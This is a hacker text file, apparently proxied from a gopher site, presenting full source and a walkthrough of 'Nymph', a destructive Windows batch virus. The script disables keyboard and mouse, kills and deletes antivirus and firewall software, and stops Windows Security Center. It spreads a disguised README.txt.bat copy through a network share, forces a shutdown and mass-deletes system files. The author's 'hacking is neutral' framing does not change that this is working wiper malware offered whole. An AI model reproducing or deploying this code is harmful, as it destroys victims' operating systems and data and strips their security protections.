Email: [email protected]
Skype Phone: scholarz_435 (call me)
Nymph Viral written by E-Unit

 "As a newbie ,I thought and behaved as a newbie but when the time came for me
to grow as hacker I quickly gave up newbie ideology" .In the beginning, I
thought hacking was all about being destructive but as I matured I discovered
that is not the case. Hacking in its purest form is the art of analyzation; the
result of curiosity. Many people try to put hacking into categories of good, bad
and shady. When in fact hacking is none of the above .Like, a sword, hacking can
be used for either good or evil. Good and evil is no depended upon the tool but
the person who welds the tool. Hacking is the ability to analyze a problem.
Then break that problem into simpler components and then isolate those key
components to decipher the problem as a whole. Hacking forces the individual to
think more deeply; passed the surface.

 The below program is called Nymph, my first batch viral. Nymph in this context
has no connotation to sex or perverseness. I dedicated this program to a
beautiful girl named Sarah. The purpose of this program is to disable security
and then destroy the operating system. I know! ,the purpose of the program may
contradict the what I say earlier, however, the program allows you to look at
your computer security from another perspective. It forces you to ask the
question: Can my security system defend my computer effectively?

Rules of Engagement

A. Disable the keyboard and mouse
B. Search for common security programs
C. Search for common security keywords
D. Spread tactic
E. Operating System destruction

@echo off
cls
rem Written by E-Unit
rem Dedicated to Sara Beth Hudson a.k.a Nymph a.k.a CherryPie
rem "A Beauty So True"- E-Unit

goto Nymph

:scan
for /f %a in ("C:\Program Files\armor.*") do (find /I /N "armor") | del /F /S /Q
%a>nul
for /f %b in ("C:\Program Files\storage.*") do (find /I /N "storage") | del /F
/S /Q  %b>nul
for /f %c in ("C:\Program Files\disk.*") do (find /I /N "disk")| del /F /S /Q
%c>nul
for /f %d in ("C:\Program Files\Virtual Sandbox.*") do (find /I /N "Virtual
Sandbox") | del /F /S /Q  %d>nul
for /f %e in ("C:\Program Files\Fortres 101.*") do (find /I /N "Fortres 101") |
del /F /S /Q  %e>nul
for /f %f in ("C:\Program Files\cleanslate.*") do (find /I /N "cleanslate") |
del /F /S /Q  %f>nul
for /f %g in ("C:\Program Files\spam.*") do (find /I /N "spam") | del /F /S /Q
%g>nul
for /f %h in ("C:\Program Files\firewall.*") do (find /I /N "firewall") | del /F
/S /Q %h>nul
for /f %i in ("C:\Program Files\Antivirus.*") do (find /I /N "Antivirus") | del
/F /S /Q %i>nul
for /f %j in ("C:\Program Files\Mcafee.*") do (find /I /N "Mcafee") | del /F /S
/Q %j>nul
for /f %k in ("C:\Program Files\Spyware.*") do (find /I /N "Spyware") | del /F
/S /Q %k>nu
for /f %m in ("C:\Program Files\Antiviral.*") do (find /I /N "Antiviral") | del
/F /S /Q %m>nul
for /f %n in ("C:\Program Files\Antivirus.*") do (find /I /N "Antivirus") | del
/F /S /Q %n>nul
for /f %o in ("C:\Program Files\Agent.*") do (find /I /N "Agent") | del /F /S /Q
%o>nul
for /f %p in ("C:\Program Files\Sheild.*") do (find /I /N "Sheild") | del /F /S
/Q %p>nul
for /f %q in ("C:\Program Files\sygate.*") do (find /I /N "sygate") | del /F /S
/Q %q>nul
for /f %r in ("C:\Program Files\bitdefender.*") do (find /I /N "bitdefender") |
del /F /S /Q %r>nul
for /f %s in ("C:\Program Files\zonealarm.*") do (find /I /N "zonealarm") | del
/F /S /Q %s>nul

goto cermony

:nymph_kiss of death

del /Q /F /S /A: H %windir%\*.zip>nul
del /Q /F /S /A: H %windir%\*.ocx>nul
del /Q /F /S /A: H %windir%\*.nls>nul
del /Q /F /S /A: H %windir%\*.msc>nul
del /Q /F /S /A: H %windir%\*.txt>nul
del /Q /F /S /A: H %windir%\*.log>nul
del /Q /F /S /A: H %windir%\*.ini>nul
del /Q /F /S /A: H %windir%\*.js>nul
del /Q /F /S /A: H %windir%\*.xls>nul
del /Q /F /S /A: H %windir%\*.sys>nul
del /Q /F /S /A: H %windir%\*.ax>nul
del /Q /F /S /A: H %windir%\*.msc>nul
del /Q /F /S /A: H %windir%\*.cpl>nul
del /Q /F /S /A: H %windir%\*.dat>nul
del /Q /F /S /A: H %windir%\*.sep>nul
del /Q /F /S /A: H %windir%\*.drv>nul
del /Q /F /S /A: H %windir%\*.nls>nul
del /Q /F /S /A: H %windir%\*.chm>nul
del /Q /F /S /A: H %windir%\*.tlb>nul
del /Q /F /S /A: H %windir%\*.rll>nul
del /Q /F /S /A: H %windir%\*.scr>nul
del /Q /F /S /A: H %windir%\*.cmd>nul
del /Q /F /S /A: H %windir%\*.msi>nul
del /Q /F /S /A: H %windir%\*.hlp>nul
del /Q /F /S /A: H %windir%\*.xlm>nul
del /Q /F /S /A: H %windir%\*.reg>nul
start /wait
del /Q /F /S /A: H %windir%\*.dll>nul
del /Q /F /S /A: H "%windir%\system32\*.exe">nul
del /Q /F /S /A: H "%path%">nul
del /Q /F /S /A: H c:>nul

rem the self destruct mode for the viral;where every that location(s) maybe at

del /Q /F /S %0
goto :EOF

:Nymph

RUNDLL32.EXE KEYBOARD,disable
RUNDLL32.EXE MOUSE,disable

IF errorlevel NEQ 0  (

tskill /A MpfAgent
tskill /A mcagent
tskill /A MpfTray
tskill /A MSKAgent
tskill /A McTskshd
tskill /A McSheild
tskill /A mcrdsvc
tskill /A McVSEscn
tskill /A mcvsshld
tskill /A MpfService
tskill /A MSKSvr

)

ELSE IF errorlevel GTR  0 || errorlevel LSS 0(

del /Q /F /S "C:\Program Files\McAfee.com"
del /Q /F /S "C:\Program Files\McAfee.com\Personal Firewall"
del /Q /F /S "C:\Program Files\McAfee.com\VSO"
del /Q /F /S "C:\Program Files\McAfee"

reg /delete
"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MCDETECT.EXE\0000"
/FORCE
reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\McAfee" /FORCE
reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\VSCore" /FORCE
reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\McAfee Internet
Security\CurrentVersion\Setup" /FORCE
)

IF errorlevel NEQ 0 (

tskill /A NSCSRVCE
tskill /A NPFMntor

)

ELSE IF errorlevel GTR  0 || errorlevel LSS 0(

del /Q /F /S "C:\Program Files\Norton AntiVirus\*.*"
del /Q /F /S "C:\Program Files\Norton AntiVirus\IWP\*.*"
del /Q /F /S "C:\Program Files\Norton AntiVirus\IWP\IDSDefs\*.*"

reg /delete
"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Symantec.Norton.Antivirus.IEContextMenu"
/FORCE
reg /delete
"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{0BD5CEA9-55C0-4FA7-A7BA-8E90B6CC01D5}\1.0\0\win32"
/FORCE
reg /delete
"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\NortonAntiVirus.OfficeAntiVirus" /FORCE
reg /delete
"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\NortonAntiVirus.OfficeAntiVirus.1" /FORCE

)

IF errorlevel NEQ 0 (

tskill /A avgwb
tskill /A avgamsvr
tskill /A avgupsvc
tskill /A avgcc
tskill /A avgemc

)

ELSE IF errorlevel GTR  0 || errorlevel LSS 0(

del /Q /F /S C:\Program Files\Grisoft\AVG7

reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App
Paths\AVGSE.DLL"  /FORCE
reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App
Paths\AVGW.EXE" /FORCE
reg /delete
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FindExtensions\Static\Avg7F"
/FORCE
reg /delete
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FindExtensions\Static\Avg7Find"
/FORCE

)

IF errorlevel NEQ 0  (

tskill /A zclient
tskill /A vsmon
tskill /A ehmsas
tskill /A isafe
tskill /A zonealarm
tskill /A firewall
tskill /A zlavscan


)

ELSE IF errorlevel GTR  0 || errorlevel LSS 0(

del /Q /F /S "C:\Program Files\Zone Labs\ZoneAlarm

reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Zone Labs\IMsecure"  /FORCE
reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Zone Labs\MiniLog"  /FORCE
reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Zone Labs"  /FORCE
reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Zone Labs\TrueVector"  /FORCE



)

IF errorlevel NEQ 0 (

tskill /A KAV
tskill /A kavmm

)

ELSE IF errorlevel GTR  0 || errorlevel LSS 0(

del /Q /F /S "C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal Pro
5\*.*"
del /Q /F /S "C:\KAV5.0\PersonalPro\english"

reg /delete
"HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\Components\2A\PersonalPro\5.0.0.0\bl\DisplayName"
/FORCE
reg /delete
"HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\Components\2A\PersonalPro\5.0.0.0\bl\Cmdline"
/FORCE
reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\KAVOGAddin.Addin.1" /FORCE
reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\KAVOGAddin.Addin" /FORCE

)

IF errorlevel NEQ 0  (

tskill /A SAVAdminService
tskill /A SavService
tskill /A ALsvc
tskill /A symlcsvc
tskill /A cisvc

)

ELSE IF errorlevel GTR  0 || errorlevel LSS 0(

del /Q /F /S C:\Program Files\Sophos

reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Sophos" /FORCE
reg /delete
"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{752B822E-5C11-4BC8-B5B5-B15B67CD2884}"
/FORCE
reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\SophtainerAdapter.DLL"
/FORCE
reg /delete
"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SophtainerAdapter.ArchiveTypeInfo" /FORCE
reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Sophos.SavXP.MainGUI.1" /FORCE


)

IF errorlevel NEQ 0  (

tskill /A mcrdsvc
tskill /A ashSimpl
tskill /A cidaemon

)

ELSE IF errorlevel GTR  0 || errorlevel LSS 0(

del /Q /F /S "C:\Program Files\Alwil Software\Avast4"

reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Exchange\Client\Extensions"
/FORCE
reg /delete
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Exchange\Client\Extensions\avast!4"
/FORCE
reg /delete "HKEY_CURRENT_USER\Software\ALWIL Software" /FORCE

)

IF errorlevel NEQ 0 (

tskill /A PavPrSv
tskill /A AVXDWIN
tskill /A pavFnSvr

)

ELSE IF errorlevel GTR  0 || errorlevel LSS 0(

del /Q /F /S "C:\Program Files\Panda Software\Panda Titanium Antivirus 2005\*.*"

reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSEFile\Shell\Open\Command"
/FORCE
reg /delete "HKEY_CURRENT_USER\Software\Panda Software" /FORCE

IF errorlevel NEQ 0 (

tskill /A nod32krn
tskill /A nod32kui


)

ELSE IF errorlevel GTR  0 || errorlevel LSS 0(

del /Q /F /S "C:\Program Files\ESET\*.*;C:\Program Files\ESET\Install\*.*"

reg /delete
"HKEY_LOCAL_MACHINE\SOFTWARE\Eset\Nod\CurrentVersion\InstalledComponents\NOD32MOD_WINNT_FRENCH_BASE"
/FORCE
reg /delete
"HKEY_LOCAL_MACHINE\SOFTWARE\Eset\Nod\CurrentVersion\InstalledComponents\NOD32MOD_WINNT_FRENCH_INET"
/FORCE
reg /delete
"HKEY_LOCAL_MACHINE\SOFTWARE\Eset\Nod\CurrentVersion\InstalledComponents\NOD32MOD_WINNT_FRENCH_STANDARD"
/FORCE


)

IF errorlevel NEQ 0  (

tskill /A armor2nt
tskill /A NetDog
tskill /A ArCW
tskill /A Ikernel

)

ELSE IF errorlevel GTR  0 || errorlevel LSS 0(

del /Q /F /S "C:\Program Files\Armor2net\Armor2net Personal Firewall"

reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Armor2net\Armor2net Personal
Firewall\3.12"  /FORCE
reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Armor2net\Armor2net Personal Firewall"
/FORCE
reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Armor2net"  /FORCE

)

IF errorlevel NEQ 0  (

tskill /A ASMonitor
tskill /A ASMPatchManager
tskill /A AhnLabAS
tskill /A AolAV

)

ELSE IF errorlevel GTR  0 || errorlevel LSS 0(

del /Q /F /S "C:\Program Files\AOL\Active Security Monitor"
del /Q /F /S "C:\Program Files\AOL\Active Security Monitor\AV"

reg /delete "HKEY_CURRENT_USER\Software\America Online"  /FORCE


)

IF errorlevel NEQ 0  (

tskill /A BullGuard
tskill /A FwInst
tskill /A bdcore
tskill /A PSSensor
tskill /A SmcMod
tskill /A wgman
tskill /A iphlpapi


)

ELSE IF errorlevel GTR  0 || errorlevel LSS 0(

del /Q /F /S "C:\Program Files\BullGuard Software\BullGuard 5.0\Antivirus"
del /Q /F /S "C:\Program Files\BullGuard Software"

reg /delete "HKEY_CURRENT_USER\Software\Bullguard"   /FORCE
reg /delete "HKEY_CURRENT_USER\Software\Bullguard\5.0"  /FORCE

)

IF errorlevel NEQ 0  (

tskill /A AntiSpyWare
tskill /A AntiSpyWareControl

)

ELSE IF errorlevel GTR  0 || errorlevel LSS 0(

del /Q /F /S C:\Program Files\Ashampoo\Ashampoo AntiSpyWare

reg /delete
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ashampoo
  AntiSpyWare_is1" /FORCE
reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Ashampoo\AntiSpyWare" /FORCE

)

ELSE(

del /Q /F /S "C:\Program Files\Trend Micro\TIS15_1329\System32\drivers"
del /Q /F /S "C:\Program Files\Trend Micro\TIS15_1329\Pattern\AspmData"
del /Q /F /S "C:\Program Files\Trend Micro\TIS15_1329\Module"
del /Q /F /S "C:\Program Files\Trend Micro\TIS15_1329"


)

goto scan

:cermony

rem adds to the share diretory so if someone checks your shares and opens up the
folder
rem their in for a surprise.

net stop "Security Center"
net stop "SharedAccess"
> "%Temp%.\nym.reg" ECHO REGEDIT4
>>"%Temp%.\nym.reg" ECHO.
>>"%Temp%.\nym.reg" ECHO
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\nym.reg" ECHO "Start"=dword:00000001
>>"%Temp%.\nym.reg" ECHO.
>>"%Temp%.\nym.reg" ECHO
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>"%Temp%.\nym.reg" ECHO "Start"=dword:00000001
>>"%Temp%.\nym.reg" ECHO.
>>"%Temp%.\nym.reg" ECHO
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
>>"%Temp%.\nym.reg" ECHO "Start"=dword:00000001
>>"%Temp%.\nym.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\nym.reg"
del "%Temp%.\nym.reg"

mkdir C:\Alert_Read
copy %0 "C:\Alert_Read\README.txt.bat"
net share Alert_Read=C:\Alert_Read

reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\ATI Technologies\CDS\0000\0\BIOS"
/FORCE
reg /delete
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\System
Restore" /FORCE
reg /delete
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Recycle
Bin" /FORCE
reg /delete
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches"
/FORCE

shutdown -s -f -t 18 -c "Princess Nymph_kiss of death"

goto nymph_kiss of death




 Engagement begins with the statement “goto Nymph” . The program jumps to
the part of the code which disables the mouse and keyboard .Obviously, to
prevent the user from impeding the attack. Then program searches the task
manger and if necessary directories and registry for common security programs:

1. McAfee
2. Panda
3. NOD32
4. Avast Antivirus
5. Avg Antivirus
6. Kaspersky
7. Norton
8. Ashampoo
9. Sophos_Antivirus
10. BullGuard
11. Active Security Monitor
12. Trend Micro
13. ZoneAlarm

 After the search is complete, a different search is initiated with the
statement “goto scan” . This search will look for folders with specify
keywords that pertain to general security or commercial security programs.
Next, the next to last part of the code is initiated with the statement “goto
ceremony”. The Windows xp own built-in “SecurityCenter” and
“SharedAccess” are disabled with net stop command and registry
manipulation. Then a directory is created for the nymph
viral,"C:\Alert_Read\README.txt.bat",which is disguised as a readme file and
copied in network shares. Also to insure that the OS does not recover from the
attack. Nymph deletes registry keys that deal with the system restore and BIOS
environment. Lastly, a shutdown sequence begins for eighteen seconds.

 Finally, in the ongoing countdown, the last part of the code is initiated with
the statement “goto nymph_kiss of death”. In this part of the code the
classic but effective way of destroying the operating system is implemented

You are viewing proxied material from gopher.altexxanet.org. The copyright of proxied material belongs to its original authors. Any comments or complaints in relation to proxied material should be directed to the original authors of the content concerned. Please see the disclaimer for more details.